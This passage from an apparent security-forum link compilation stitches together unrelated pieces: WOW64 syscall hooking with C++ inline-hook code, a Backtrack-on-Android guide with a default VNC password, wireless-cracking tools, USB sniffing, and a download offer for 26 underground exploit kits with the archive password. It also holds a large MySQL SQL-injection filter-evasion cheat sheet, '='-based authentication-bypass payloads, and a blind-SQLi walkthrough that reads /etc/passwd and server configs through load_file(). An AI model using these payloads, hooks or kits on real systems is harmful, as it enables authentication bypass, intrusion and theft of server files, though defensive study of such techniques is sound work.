Hooking this would not make much sense, since one could gather the same data right after the sysenter within kernelland. Now fast forward to Windows 7, 64bit, with a 32bit process running on WOW64. For the following, I will use the 64bit WinDbg version.

On this newer environment, the code executed by a system call wrapper, such as ntdll!ZwCreateFile in this example, does not take any indirection through KUSER_SHARED_DATA. Instead, it calls a function pointer within the TEB:

    0:000:x86> u ntdll32!ZwCreateFile
    ntdll32!ZwCreateFile:
    77a80054 b852000000      mov     eax,52h
    77a80059 33c9            xor     ecx,ecx
    77a8005b 8d542404        lea     edx,[esp+4]
    77a8005f 64ff15c0000000  call    dword ptr fs:[0C0h]
    77a80066 83c404          add     esp,4
    77a80069 c22c00          ret     2Ch

This field is called WOW32Reserved and points into wow64cpu:

    +0x0c0 WOW32Reserved : 0x743b2320
    0:000:x86> u 743b2320 L1
    wow64cpu!X86SwitchTo64BitMode:
    743b2320 ea1e273b743300  jmp     0033:743B271E

This is in turn a far jmp into the 64bit code segment. The absolute address points into the 64bit part of wow64cpu, which sets up the 64bit stack first:

    0:000> u 743B271E
    wow64cpu!CpupReturnFromSimulatedCode:
    00000000`743b271e 67448b0424        mov     r8d,dword ptr [esp]
    00000000`743b2723 458985bc000000    mov     dword ptr [r13+0BCh],r8d
    00000000`743b272a 4189a5c8000000    mov     dword ptr [r13+0C8h],esp
    00000000`743b2731 498ba42480140000  mov     rsp,qword ptr [r12+1480h]

Following this, the code converts the system call specific parameters to their 64bit equivalents and then transitions to the original kernel code. So the only way to grab the unmodified 32bit system calls (and parameters), before any conversion is done, is to hook this code.

My first idea was to hijack the writable function pointer inside the TEB, but that involves the inconvenience that I need to track threads and modify it for every new thread. Since this function pointer always points to the same location, I decided to go for an inline function hook. In this case, the hook is very simple, since I know that there will be one long enough instruction with fixed-length operands. However, we have to take into account SMP systems that might be decoding this instruction while we're writing there, so it is desirable to use a locked write.

Unfortunately, there is not enough room around the instruction to write the hook there and overwrite the original instruction with a near jmp (two bytes, which can be written atomically with mov if the address is word-aligned, or with xchg in the general case). Hence we need to write our five bytes with one single locked write. There is (at least?) one instruction on x86 in 32bit mode which can do that: cmpxchg8b. Reading the processor manual, it becomes obvious that we can abuse this to do an unconditional write if we just execute two subsequent cmpxchg8b in a row (assuming that no one else is writing there concurrently):

    asm("cmpxchg8b (%6)\n\t"
        "cmpxchg8b (%6)"
        : "=a" (*(DWORD *) origTrampoline),
          "=d" (*(DWORD *) &origTrampoline[4])
        : "a" (*(DWORD *) trampoline),
          "d" (*(DWORD *) &trampoline[4]),
          "b" (*(DWORD *) trampoline),
          "c" (*(DWORD *) &trampoline[4]),
          "D" (fnX86SwitchTo64BitMode));

One can read out the original jump destination in between those two instructions from edx:eax to hotpatch your hook before it is eventually inserted. This is especially useful when a debugger is attached, as single-stepping results in the syscall trampoline being silently executed (this is great for debugger detection). The hook can then just end in the same jmp far 0x33:?? that was present at X86SwitchTo64BitMode; one just needs to preserve esp and eax.

Happy hooking!

Source: Hooking 32bit System Calls under WOW64
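The five-byte write described in the post above, as an added example written for this page rather than the post's own code: the same unconditional 8-byte store done with a compiler atomic on a constructed byte buffer that mirrors the jmp far at X86SwitchTo64BitMode, keeping the three bytes after the patch unchanged and handing back the original bytes for a trampoline. It also shows the step the post only mentions, reading the original far-jump destination out of those bytes. The virtual addresses, the hook address, the buffer contents and the GCC/Clang __atomic builtins are assumptions of the example; a 32-bit x86 build typically implements the 64-bit exchange with a lock cmpxchg8b loop, which is the instruction the post uses, while a 64-bit build uses a plain xchg.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstring>

// Little-endian readers for the operands of "jmp far ptr16:32" (opcode EA, 4-byte offset,
// 2-byte selector), the instruction wow64cpu!X86SwitchTo64BitMode consists of.
uint32_t le32(const uint8_t* p) {
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}
uint16_t le16(const uint8_t* p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

// rel32 operand of a 5-byte "jmp rel32" (opcode E9) placed at `from` that should land on `to`;
// the displacement is relative to the end of the jmp instruction.
int32_t jmpRel32(uint32_t from, uint32_t to) {
    return (int32_t)(to - (from + 5));
}

struct HookResult {
    bool     ok;            // false if the site was not a jmp far or changed under our feet
    uint32_t origOffset;    // target of the original jmp far (0x743B271E in the post)
    uint16_t origSelector;  // its code segment selector (0x33, the 64-bit code segment)
    uint8_t  saved[8];      // the 8 bytes that were overwritten, for a trampoline
};

// Overwrite the first 5 bytes of the 8-byte word at `site` with "jmp rel32 -> hookVa" using a
// single atomic 64-bit exchange; bytes 5..7 are written back unchanged.  `siteVa` is the
// address the patched instruction executes at (the buffer here only stands in for it).
// A CPU fetching the word sees either the old or the new instruction, never a torn one.
HookResult installHook(uint64_t* site, uint32_t siteVa, uint32_t hookVa) {
    HookResult r{};
    uint64_t old = __atomic_load_n(site, __ATOMIC_SEQ_CST);
    std::memcpy(r.saved, &old, sizeof old);
    if (r.saved[0] != 0xEA)            // not the jmp far we expect: refuse to patch blindly
        return r;
    r.origOffset   = le32(r.saved + 1);
    r.origSelector = le16(r.saved + 5);

    uint8_t patched[8];
    std::memcpy(patched, r.saved, sizeof patched);   // keep bytes 5..7 as they are
    patched[0] = 0xE9;
    int32_t rel = jmpRel32(siteVa, hookVa);
    std::memcpy(patched + 1, &rel, sizeof rel);       // little-endian on x86

    uint64_t word;
    std::memcpy(&word, patched, sizeof word);
    uint64_t seen = __atomic_exchange_n(site, word, __ATOMIC_SEQ_CST);
    if (seen != old) {                 // someone else wrote the site in between
        std::memcpy(r.saved, &seen, sizeof seen);     // record what we actually overwrote
        return r;
    }
    r.ok = true;
    return r;
}

int main() {
    // Constructed stand-in for "743b2320 ea1e273b743300 jmp 0033:743B271E", padded with int3.
    const uint8_t original[8] = {0xEA, 0x1E, 0x27, 0x3B, 0x74, 0x33, 0x00, 0xCC};
    uint64_t site;
    std::memcpy(&site, original, sizeof site);

    // siteVa is the address from the post; the hook address is made up for the example.
    HookResult r = installHook(&site, 0x743B2320u, 0x10001000u);
    uint8_t now[8];
    std::memcpy(now, &site, sizeof now);
    std::printf("ok=%d original target %04X:%08X, site now:", r.ok, r.origSelector, r.origOffset);
    for (uint8_t b : now) std::printf(" %02X", b);
    std::printf("\n");
    return r.ok ? 0 : 1;
}
```

In a real hook the trampoline is built from saved[] (the recovered 0033:743B271E target is what the hook jumps to when it is done, as the post says), and the two leftover bytes of the old selector after the new jmp are never executed because the near jmp leaves the site before reaching them.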
10. Whois, Ping, Port Scanner, NSlookup & Traceroute

Over 7,191,224 guests have used these services to scan over 1,593,876,587 ports, perform 7,490,661 nslookups, 70,948 ping requests, 414,862 traceroute requests and 71,246 whois requests. Thank you for helping us become the leader in web-based network tools!

Link: http://www.t1shopper.com/tools/
11. Backtrack 5 install on Samsung Galaxy S

I just finished a Backtrack 5 install on my Samsung Galaxy S phone. I will detail the steps to get it running on most Android phones. This method was ONLY tested on my Galaxy S (Vibrant), but it should work with other devices. README.winning!

I have split this guide into two sections. The first section, titled "Quick Version", is a simple set of steps to get this working on your phone; all the work in the full version has already been completed for you. The "Full Version" goes into process detail if you would like to perform all the steps yourself, or it may help if you get stuck at any time during the process. This guide will continually be updated to include any feedback or changes.

Quick Version:

1. Download the complete set of files you need from here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip
   Extract BT5.zip to your phone's internal SD card in a directory called "BT5" (cAsE sEnSiTiVe).

2. Launch the terminal emulator on your phone and type (everything after the $: or #: is user input):

    $: su
    #: cd sdcard
    #: cd BT5
    #: sh bootbt

3. While Backtrack is loaded (when you see a red "root@localhost"), start the VNC server by typing:

    root@localhost:~#: startvnc

   (stopvnc kills it)

4. Launch VNC (I'm using this) on your phone and point it at 127.0.0.1:5901. VNC password: toortoor

5. Welcome to Backtrack on your phone!

Tutorial: http://pauldotcom.com/2011/05/backtrack-5-install-on-samsung.html
12. The idea behind the term "hack" is simple: advertising. They wanted those who signed up to use their frameworks: YQL, YUI... It's obvious: there is no connection between using a framework and being a hacker. What I mean is: frameworks help you do various things more easily. Using something like that, you do with one line of code what you would otherwise need 50 for, because those 50 lines are already written. That means you don't know exactly what happens when you write that line of code, and you end up unable to do that action without the framework. And that is in total contradiction with the term "hack", which implies learning something, discovering, CREATING something. It's like handing a program to a kid and having him use it. You'd call him a script kiddie. In my opinion, that is the idea they went with here too: promoting their frameworks, which in the end means promoting script-kiddying. There is more to say about Pax and Cheater's project. First of all, it is closer to the term "hack" than the pile of stinking, stupid, pathetic and useless crap that not even the parents of those who made it would give two cents for. The idea was original: "Vasile" visits a page and boom: he finds that he has granted access to his account to "x" and "y" and has unwittingly sent a message with that link to his whole messenger list. It is a direct attack on Yahoo!'s security, so it is directly related to the term "hack". The problem was the internet connection; he didn't have time to show the demo. And I think the Yahoo! people are not very familiar with this term, XSS, and neither were many of those who attended. As an event I liked it: we ate, we drank, we talked, the atmosphere was pleasant, it was very well organized, very strict, and everything was very well put together.
13. Linux exploit development part 4

Authored by sickness | Posted May 15, 2011

Whitepaper called Linux exploit development part 4 - ASCII armor bypass + return-to-plt.

Download:
http://packetstormsecurity.org/files/download/101426/lewt4-bypass.pdf
http://www.exploit-db.com/download_pdf/17286
14. KisMAC - Wireless Security Tool for Mac OS

Having covered so many tools for both the Linux and Windows operating systems, this article will talk about a wireless LAN (WLAN) security tool that is available for the Mac operating system. This article is linked with the series of articles on wardriving. Wardriving is the act of searching for, locating and exploiting access points. If you are a regular user of the Mac operating system, this tool is for you: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X. KisMAC is the Mac counterpart of NetStumbler for Windows and Kismet for Linux; the overall idea of wardriving is the same. You can install KisMAC on your MacBook and start driving; the gpsd concept is the same as well. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. KisMAC supports many third-party USB devices: Intersil Prism2, Ralink rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning.

Key Features
- Reveals hidden / cloaked / closed SSIDs
- Shows logged-in clients (with MAC addresses, IP addresses and signal strengths)
- Mapping and GPS support
- Can draw area maps of network coverage
- PCAP import and export
- Support for 802.11b/g
- Different attacks against encrypted networks
- Deauthentication attacks
- AppleScript-able
- Kismet drone support (capture from a Kismet drone)

Cracking Support
- Bruteforce attacks against LEAP, WPA and WEP
- Weak scheduling attack against WEP
- Newsham 21-bit attack against WEP

Download: http://kismac-ng.org/
Tutorial: http://trac.kismac-ng.org/wiki/tutorials

Source: KisMAC- Wireless Security Tool For MAC OS | Ethical Hacking-Your Way To The World OF IT Security
15. USB sniffing on Linux

March 18th, 2009

The Linux kernel has a facility called "usbmon" which can be used to sniff the USB bus. It has been in there for ages, and the output is really easy to collect, even from the command line shell. Simply mount debugfs and load the usbmon module:

    mount -t debugfs none_debugs /sys/kernel/debug
    modprobe usbmon

Then you can just cat USB traffic like this:

    cat /sys/kernel/debug/usbmon/1u

It all comes out in an ASCII dump format which is easily parsed. Every USB bus also has a device file where you can sniff the raw packets straight off the wire. More info is in the usbmon documentation.

But while it is all easily parsed if you need it, there aren't really any tools around that do it for you. That is... except for libpcap. Libpcap is the power behind the throne of the venerable tcpdump tool. Tcpdump is not much more than a command line parser and pretty-printer of various network protocols. The heavy lifting is done by libpcap, not least by providing a cross-platform API for sniffing devices, something that is otherwise non-standard and different on every platform. It's great; I've used it before (in capstats) and it's very easy to use. Libpcap on Linux supports usbmon sniffing, which means you can use tcpdump to sniff a USB port and write this to a capture file. But best of all: Wireshark, the all-singing all-dancing network analyzer that uses tcpdump capture files, has USB support as well. So this is the result:

The screenshot shows a filter applied to only see device 18 on the sniffed USB bus. That's an Arduino, i.e. an FTDI USB-serial chip. The FTDI chips send status updates to the USB host system every 16ms (!). The status update consists of a two-byte message (described here). This is actually present in every packet coming in from the FTDI chip; status updates just don't have any other data. So for a clean sniffing session from the Arduino, we want to filter out any packets that are < 3 bytes in length.

The end result is the serial data which the Arduino sent to the host system. The screenshot shows a session on my Arduino shell, arsh. This is great stuff; Wireshark includes a massive amount of analysis tools and lots of options for filtering and otherwise massaging your captured data.

You need relatively recent versions of libpcap, tcpdump and Wireshark for this. I compiled all three of these from their respective repositories (all easy to compile). On my Ubuntu system, the libpcap version was particularly old. Tcpdump doesn't have a pretty-printer for USB data yet, so you can only dump to a capture file for processing by Wireshark.

Source: bert's blog » Blog Archive » USB sniffing on linux
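The filtering the post describes (keep only device 18, drop the sub-3-byte FTDI status packets, treat what remains as serial data) can also be done directly on the usbmon text format, without libpcap. The following C program is an added example and not the post's own code; the usbmon lines it parses are constructed to resemble the capture described, and the device numbers, URB tags and the FTDI status header bytes are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample of /sys/kernel/debug/usbmon/1u text (not a real capture):
 * a control request to the root hub, then traffic of device 18 (the FTDI chip
 * on the Arduino) and one packet from an unrelated device 17. "0160" stands in
 * for the two FTDI status bytes (modem status, line status); "arsh> " is the
 * shell prompt, and "ls" is a command typed by the host. */
static const char *const kSample[] = {
    "ffff88003d2e0a00 1255000000 S Ci:1:001:0 s 80 06 0100 0000 0040 64 <",
    "ffff88003d2e1b80 1255010834 S Bi:1:018:1 -115 64 <",
    "ffff88003d2e1b80 1255026850 C Bi:1:018:1 0 2 = 0160",
    "ffff88003d2e1c00 1255026900 S Bo:1:018:2 -115 2 = 6c73",
    "ffff88003d2e1b80 1255042890 C Bi:1:018:1 0 8 = 01606172 73683e20",
    "ffff88003d2e1d40 1255058910 C Bi:1:017:1 0 3 = 016041",
};
static const size_t kSampleCount = sizeof kSample / sizeof kSample[0];

/* The fields of one usbmon text record that the filter below needs. */
typedef struct {
    char event;        /* 'S' submission, 'C' callback (completion), 'E' error */
    char xfer[3];      /* transfer type and direction: "Ci", "Co", "Bi", "Bo", ... */
    int bus, dev, ep;
    int status;        /* -115 (EINPROGRESS) on submission, URB status on completion */
    int len;           /* data length as reported by usbmon */
    uint8_t data[64];  /* payload decoded from the hex words, if the line carries any */
    int ndata;
} urb_t;

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)tolower((unsigned char)c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Parse "<tag> <ts> <event> <Type>:<bus>:<dev>:<ep> <status> <len> <=|<|>> [hex words]".
 * Returns 0 on success, 1 for a well-formed line that is not a bulk transfer
 * (control lines carry a setup packet where the length would be), -1 on garbage. */
int parse_usbmon_line(const char *line, urb_t *u) {
    unsigned long long tag, ts;
    char type[3], datatag;
    int n = 0, hi = -1;
    const char *p;

    memset(u, 0, sizeof *u);
    if (sscanf(line, "%llx %llu %c %2[A-Za-z]:%d:%d:%d %n",
               &tag, &ts, &u->event, type, &u->bus, &u->dev, &u->ep, &n) < 7)
        return -1;
    memcpy(u->xfer, type, 2);
    if (u->xfer[0] != 'B') return 1;
    p = line + n;
    if (sscanf(p, "%d %d %c %n", &u->status, &u->len, &datatag, &n) < 3) return -1;
    if (datatag != '=') return 0;          /* '<' or '>': data not captured */
    /* Data words are hex digits in 4-byte groups separated by spaces. */
    for (p += n; *p && *p != '\n' && *p != '\r'; p++) {
        int v;
        if (*p == ' ') continue;
        if ((v = hexval(*p)) < 0) return -1;
        if (hi < 0) { hi = v; continue; }
        if (u->ndata < (int)sizeof u->data) u->data[u->ndata++] = (uint8_t)(hi << 4 | v);
        hi = -1;
    }
    return 0;
}

/* Reassemble the serial stream of one device from completed bulk-IN URBs:
 * packets shorter than 3 bytes are the periodic FTDI status updates and are
 * counted rather than copied; longer ones contribute everything after the
 * 2-byte status header. Returns the number of serial bytes written to out. */
size_t extract_ftdi_serial(const char *const *lines, size_t nlines, int dev,
                           uint8_t *out, size_t outcap, int *status_only) {
    size_t n = 0;
    *status_only = 0;
    for (size_t i = 0; i < nlines; i++) {
        urb_t u;
        if (parse_usbmon_line(lines[i], &u) != 0) continue;
        if (u.dev != dev || u.event != 'C' || strcmp(u.xfer, "Bi") != 0) continue;
        if (u.ndata < 3) { (*status_only)++; continue; }
        for (int k = 2; k < u.ndata && n < outcap; k++) out[n++] = u.data[k];
    }
    return n;
}

int main(void) {
    uint8_t serial[64];
    int status_only;
    size_t n = extract_ftdi_serial(kSample, kSampleCount, 18, serial, sizeof serial, &status_only);
    printf("%d status-only packet(s) dropped; serial data: \"%.*s\"\n",
           status_only, (int)n, (const char *)serial);
    return 0;
}
```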
16. 26 Underground Hacking Exploit Kits available for Download ! : The Hacker News

List of Hacking Exploit Kits:
Unknow
Tor
Target-Exploit
Smart pack
RDS
My poly sploit
multisploit
mypack-009
mypack-091
mypack-086
mypack-081
Mpack
Infector
Ice-pack-1
Ice-pack-2
Ice-pack-3
G-pack
Fire pack -1
Fire Pack -2
Fiesta -1
Fiesta -2
Cry 217
Armitage
Adpack -1
Adpack -2
0x88

Download: http://www.multiupload.com/EFDCHHZ9ZD
Password: thn

Source: 26 Underground Hacking Exploit Kits available for Download ! ~ THN : The Hackers News
17. I "am" from Bucharest. I'll get there around 8 - 8:20. But I don't know how we should arrange it. I'm going to meet up with Cheater. You can come wearing the "Fan RST" T-shirts.
18. NetBSD Internals

The NetBSD Developers
Copyright © 2006, 2007, 2008, 2009, 2010 The NetBSD Foundation
All brand and product names used in this guide are or may be trademarks or registered trademarks of their respective owners. NetBSD® is a registered trademark of The NetBSD Foundation, Inc.
Published: 2010/03/06 16:30:38
$NetBSD: index.html,v 1.18 2010/04/30 16:19:12 jakllsch Exp $

Table of Contents

Purpose of this book
1. Memory management
   1.1. The UVM virtual memory manager
   1.2. Managing wired memory
2. File system internals
   2.1. vnode layer overview
   2.2. VFS layer overview
   2.3. File systems overview
   2.4. Initialization and cleanup
   2.5. Mounting and unmounting
   2.6. File system statistics
   2.7. vnode management
   2.8. The root vnode
   2.9. Path name resolution procedure
   2.10. File management
   2.11. Symbolic link management
   2.12. Directory management
   2.13. Special nodes
   2.14. NFS support
   2.15. Step by step file system writing
3. Processes and threads
   3.1. Process startup
   3.2. Traps and system calls
   3.3. Processes and threads creation
   3.4. Processes and threads termination
   3.5. Signal delivery
   3.6. Thread scheduling
4. Networking
   4.1. Routing
   4.2. Sockets
   4.3. mbufs
   4.4. IP layer
   4.5. UDP
   4.6. TCP
5. Networking Services
   5.1. IEEE 802.11
   5.2. ISDN
   5.3. IPSec
   5.4. Networking pseudo-devices
   5.5. Packet Filters
6. Regression testing
   6.1. Testing file systems
A. Acknowledgments
   A.1. Authors
   A.2. License
B. Bibliography

Tutorial: http://netbsd.org/docs/internals/en/index.html
19. SQLi filter evasion cheat sheet (MySQL)

This week I presented my experiences in SQLi filter evasion techniques, gained during 3 years of PHPIDS filter evasion, at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheat sheet. A more detailed explanation can be found in the slides or in the talk (the video should come online in a few weeks).

Basic filter

Comments
    ' or 1=1#
    ' or 1=1-- -
    ' or 1=1/*   (MySQL < 5.1)
    ' or 1=1;%00
    ' or 1=1 union select 1,2 as `
    ' or#newline
    1='1
    ' or-- -newline
    1='1
    ' /*!50000or*/1='1
    ' /*!or*/1='1

Prefixes
    + - ~ !
    ' or --+2=- -!!!'2

Operators
    ^, =, !=, %, /, *, &, &&, |, ||, >>, <=, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
    %20 %09 %0a %0b %0c %0d %a0 /**/
    'or+(1)sounds/**/like"1"--%a0-
    'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
    SELECT 'a'
    SELECT "a"
    SELECT n'a'
    SELECT b'1100001'
    SELECT _binary'1100001'
    SELECT x'61'

Strings without quotes
    'abc' = 0x616263

Aliases
    select pass as alias from users
    select pass aliasalias from users
    select pass`alias alias`from users

Typecasting
    ' or true = '1                              # or 1=1
    ' or round(pi(),1)+true+true = version()    # or 3.1+1+1 = 5.1
    ' or '1                                     # or true

Compare operator typecasting
    select * from users where 'a'='b'='c'
    select * from users where ('a'='b')='c'
    select * from users where (false)='c'
    select * from users where (0)='c'
    select * from users where (0)=0
    select * from users where true
    select * from users

Authentication bypass '='
    select * from users where name = ''=''
    select * from users where false = ''
    select * from users where 0 = 0
    select * from users where true
    select * from users

Authentication bypass '-'
    select * from users where name = ''-''
    select * from users where name = 0-0
    select * from users where 0 = 0
    select * from users where true
    select * from users

Function filter

General function filtering
    ascii (97)
    load_file/*foo*/(0x616263)

Strings with functions
    'abc' = unhex(616263)
    'abc' = char(97,98,99)
    hex('a') = 61
    ascii('a') = 97
    ord('a') = 97
    'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets
    collation(\N)                 // binary
    collation(user())             // utf8_general_ci
    @@time_format                 // %H:%i:%s
    @@binlog_format               // MIXED
    @@version_comment             // MySQL Community Server (GPL)
    dayname(from_days(401))       // Monday
    dayname(from_days(403))       // Wednesday
    monthname(from_days(690))     // November
    monthname(from_unixtime(1))   // January
    collation(convert((1)using/**/koi8r))   // koi8r_general_ci
    (select(collation_name)from(information_schema.collations)where(id)=2)   // latin2_czech_cs

Special characters extracted from gadgets
    aes_encrypt(1,12)             // 4çh±{?"^c×HéÉEa
    des_encrypt(1,2)              // ‚GÒ/ïÖk
    @@ft_boolean_syntax           // + -><()~*:""&|
    @@date_format                 // %Y-%m-%d
    @@innodb_log_group_home_dir   // .\

Integer representations
    false: 0
    true: 1
    true+true: 2
    floor(pi()): 3
    ceil(pi()): 4
    floor(version()): 5
    ceil(version()): 6
    ceil(pi()+pi()): 7
    floor(version()+pi()): 8
    floor(pi()*pi()): 9
    ceil(pi()*pi()): 10
    concat(true,true): 11
    ceil(pi()*pi())+true: 11
    ceil(pi()+pi()+version()): 12
    floor(pi()*pi()+pi()): 13
    ceil(pi()*pi()+pi()): 14
    ceil(pi()*pi()+version()): 15
    floor(pi()*version()): 16
    ceil(pi()*version()): 17
    ceil(pi()*version())+true: 18
    floor((pi()+pi())*pi()): 19
    ceil((pi()+pi())*pi()): 20
    ceil(ceil(pi())*version()): 21
    concat(true+true,true): 21
    ceil(pi()*ceil(pi()+pi())): 22
    ceil((pi()+ceil(pi()))*pi()): 23
    ceil(pi())*ceil(version()): 24
    floor(pi()*(version()+pi())): 25
    floor(version()*version()): 26
    ceil(version()*version()): 27
    ceil(pi()*pi()*pi()-pi()): 28
    floor(pi()*pi()*floor(pi())): 29
    ceil(pi()*pi()*floor(pi())): 30
    concat(floor(pi()),false): 30
    floor(pi()*pi()*pi()): 31
    ceil(pi()*pi()*pi()): 32
    ceil(pi()*pi()*pi())+true: 33
    ceil(pow(pi(),pi())-pi()): 34
    ceil(pi()*pi()*pi()+pi()): 35
    floor(pow(pi(),pi())): 36
    @@new: 0
    @@log_bin: 1
    !pi(): 0
    !!pi(): 1
    true-~true: 3
    log(-cos(pi())): 0
    -cos(pi()): 1
    coercibility(user()): 3
    coercibility(now()): 4
    minute(now())
    hour(now())
    day(now())
    week(now())
    month(now())
    year(now())
    quarter(now())
    year(@@timestamp)
    crc32(true)

Extract substrings
    substr('abc',1,1) = 'a'
    substr('abc' from 1 for 1) = 'a'
    substring('abc',1,1) = 'a'
    substring('abc' from 1 for 1) = 'a'
    mid('abc',1,1) = 'a'
    mid('abc' from 1 for 1) = 'a'
    lpad('abc',1,space(1)) = 'a'
    rpad('abc',1,space(1)) = 'a'
    left('abc',1) = 'a'
    reverse(right(reverse('abc'),1)) = 'a'
    insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
    space(0) = trim(version()from(version()))

Search substrings
    locate('a','abc')
    position('a','abc')
    position('a' IN 'abc')
    instr('abc','a')
    substring_index('ab','b',1)

Cut substrings
    length(trim(leading 'a' FROM 'abc'))
    length(replace('abc', 'a', ''))

Compare strings
    strcmp('a','a')
    mod('a','a')
    find_in_set('a','a')
    field('a','a')
    count(concat('a','a'))

String length
    length() bit_length() char_length() octet_length() bit_count()

String case
    ucase lcase lower upper
    password('a') != password('A')
    old_password('a') != old_password('A')
    md5('a') != md5('A')
    sha('a') != sha('A')
    aes_encrypt('a') != aes_encrypt('A')
    des_encrypt('a') != des_encrypt('A')

Keyword filter

Connected keyword filtering
    (0)union(select(table_name),column_name,...
    0/**/union/*!50000select*/table_name`foo`/**/...
    0%a0union%a0select%09group_concat(table_name)...
    0?union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
    '||1='1
    '&&1='1
    '='
    '-'

OR, AND, UNION
    ' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
    ' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
    ' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
    ' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
    ' and (select substr(group_concat(pass),1,1) from users)='a
    ' and substr((select max(pass) from users),1,1)='a
    ' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
    ' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
    '='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
    ' procedure analyse()#
    '-if(name='Admin',1,0)#
    '-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow
    case 'a' when 'a' then 1 [else 0] end
    case when 'a'='a' then 1 [else 0] end
    if('a'='a',1,0)
    ifnull(nullif('a','a'),1)

If you have any other useful tricks I forgot to list here, please leave a comment.

Source: SQLi filter evasion cheat sheet (MySQL) « Reiners' Weblog
20. MySQL Authentication Bypass

I already used this trick to circumvent the PHPIDS filters in some earlier versions and mentioned it briefly in my article about MySQL syntax. However, when I used the same trick to circumvent the GreenSQL database firewall, I noticed that this MySQL "bug" is not well known, so I decided to write about it briefly. Take a look at the following insecure SQL query:

    SELECT * FROM table WHERE username = '$username' and password = '$password'

Everyone knows about the simple authentication bypass using ' OR 1=1/* as username, or perhaps ' OR 1='1 for both inputs. But what MySQL also allows is a direct comparison of two strings:

    SELECT * FROM table WHERE username = 'string'='string' and password = 'string'='string'

Therefore you don't need any operators like "OR", which are mostly detected by filters. To shorten your vector you can also use an empty string, narrowing your SQL injection to:

    username: '='
    password: '='

Which ends in:

    SELECT * FROM table WHERE username = ''='' and password = ''=''

and successfully bypasses authentication on MySQL. Of course you can use other operators than "equal", and use whitespaces and prefixes to build more complex vectors to circumvent filters. Please refer to the MySQL syntax article. I have also tested this behavior on MSSQL, PostgreSQL and Oracle, which do not behave the same way.

What MySQL seems to allow is a triple comparison in a WHERE clause. That means you can use:

    SELECT * FROM users WHERE 1=1=1
    SELECT * FROM users WHERE 'a'='a'='a'

Interestingly, the following queries also work:

    SELECT * FROM users WHERE 'a'='b'='c'
    SELECT * FROM users WHERE column='b'='c'
    SELECT * FROM users WHERE column=column=1

That means that if you compare strings it doesn't matter whether they are equal: the comparison is evaluated left to right, so 'a'='b' yields 0, and 0='c' is true because the string 'c' is cast to the integer 0. It seems that when you compare columns with strings or integers they get typecast in the same way. Lastly I would like to recommend a great article by Stefan Esser about another authentication bypass on MySQL.

Updated: MySQL does not consider this a bug. Please refer to the bug report for detailed information. Again this shows how flexible the MySQL syntax is (intentionally).

Source: MySQL Authentication Bypass « Reiners' Weblog
21. Blind SQL injection with load_file()

Currently I am working a lot on RIPS, but here is a small blog post about a technique I thought about lately and wanted to share. While participating in the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege:

    /level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0x59

Luckily the FILE privilege was granted, which was not intended by the organizer. Since I had not solved level 1 at that time, I thought it would be easier to read the PHP files to solve level 1. First I checked whether reading files with load_file() worked at all and tried to read /etc/passwd:

    /level2/?id=1/**/and/**/!isnull(load_file(0x2F6574632F706173737764))

Since the webpage with id=1 was displayed, the AND condition must have evaluated to true, which means that the file could be read (load_file() returns NULL if the file cannot be read). Before reading the PHP files I needed to find the web server configuration file to find out where the DocumentRoot was configured. I used the same query as above to check for the existence of the following Apache config files:

    $paths = array(
        "/etc/passwd",
        "/etc/init.d/apache/httpd.conf",
        "/etc/init.d/apache2/httpd.conf",
        "/etc/httpd/httpd.conf",
        "/etc/httpd/conf/httpd.conf",
        "/etc/apache/apache.conf",
        "/etc/apache/httpd.conf",
        "/etc/apache2/apache2.conf",
        "/etc/apache2/httpd.conf",
        "/usr/local/apache2/conf/httpd.conf",
        "/usr/local/apache/conf/httpd.conf",
        "/opt/apache/conf/httpd.conf",
        "/home/apache/httpd.conf",
        "/home/apache/conf/httpd.conf",
        "/etc/apache2/sites-available/default",
        "/etc/apache2/vhosts.d/default_vhost.include");

Update: There is an official list for Apache. Very useful.

The webpage with id=1 was displayed for the file /etc/httpd/httpd.conf, thus revealing that this file existed and could be read.

Now it was time for the tricky part: I had only a true/false blind SQL injection, which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars, this would have taken way too long. I decided to take little shots at the configuration file, trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters:

    /level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char

